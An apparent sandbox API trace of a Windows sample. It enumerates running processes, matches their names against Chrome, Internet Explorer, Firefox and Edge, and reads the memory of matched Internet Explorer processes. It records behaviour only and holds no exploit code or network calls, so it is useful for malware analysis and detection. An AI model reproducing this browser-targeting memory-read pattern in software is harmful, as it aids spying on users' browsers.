	[0233.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0233.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0233.275] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0233.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7014
	[0233.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.276] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0233.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.277] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.277] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0233.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.278] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.278] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0233.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7018
	[0233.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.279] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0233.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.280] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.280] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0233.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.280] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.280] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0233.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x701c
	[0233.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.281] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0233.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.282] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.282] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0233.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.282] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.283] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0233.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7020
	[0233.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.284] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0233.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.285] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.285] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0233.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.285] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.285] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0233.286] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7024
	[0233.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.286] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0233.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.287] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.288] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0233.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.288] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0233.289] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7028
	[0233.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.289] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0233.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.290] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.290] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0233.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.290] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0233.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x702c
	[0233.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.292] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0233.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.293] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.293] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0233.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.293] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0233.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7030
	[0233.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.295] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0233.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.295] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.296] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0233.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.296] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0233.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7034
	[0233.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.297] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0233.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.298] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.298] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0233.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.298] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0233.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7038
	[0233.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.300] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0233.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.300] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.300] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0233.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.301] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.301] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0233.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x703c
	[0233.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.302] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0233.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.302] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.303] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0233.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.303] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0233.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7040
	[0233.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.305] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0233.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.305] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.306] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0233.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.306] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0233.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7044
	[0233.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.308] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0233.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.308] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.309] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0233.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.309] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0233.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7048
	[0233.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.310] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0233.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.311] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.312] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0233.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.312] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0233.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x704c
	[0233.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.314] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0233.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.315] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.315] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0233.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.316] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.316] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7050
	[0233.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.317] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.317] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.318] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.318] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.318] NtQueryInformationProcess (in: ProcessHandle=0x7050, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.318] ReadProcessMemory (in: hProcess=0x7050, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.318] ReadProcessMemory (in: hProcess=0x7050, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.318] ReadProcessMemory (in: hProcess=0x7050, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.318] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.319] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7054
	[0233.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.319] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.320] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.320] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.320] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.321] NtQueryInformationProcess (in: ProcessHandle=0x7054, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.321] ReadProcessMemory (in: hProcess=0x7054, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.321] ReadProcessMemory (in: hProcess=0x7054, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.321] ReadProcessMemory (in: hProcess=0x7054, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.321] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7058
	[0233.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.322] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.322] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.323] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.323] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0233.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x705c
	[0233.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.324] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0233.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.324] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.325] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0233.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.325] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7060
	[0233.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.326] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.327] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.327] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.327] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.328] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.329] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7064
	[0233.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.329] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.366] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.366] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.367] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0233.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7068
	[0233.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0233.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0233.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
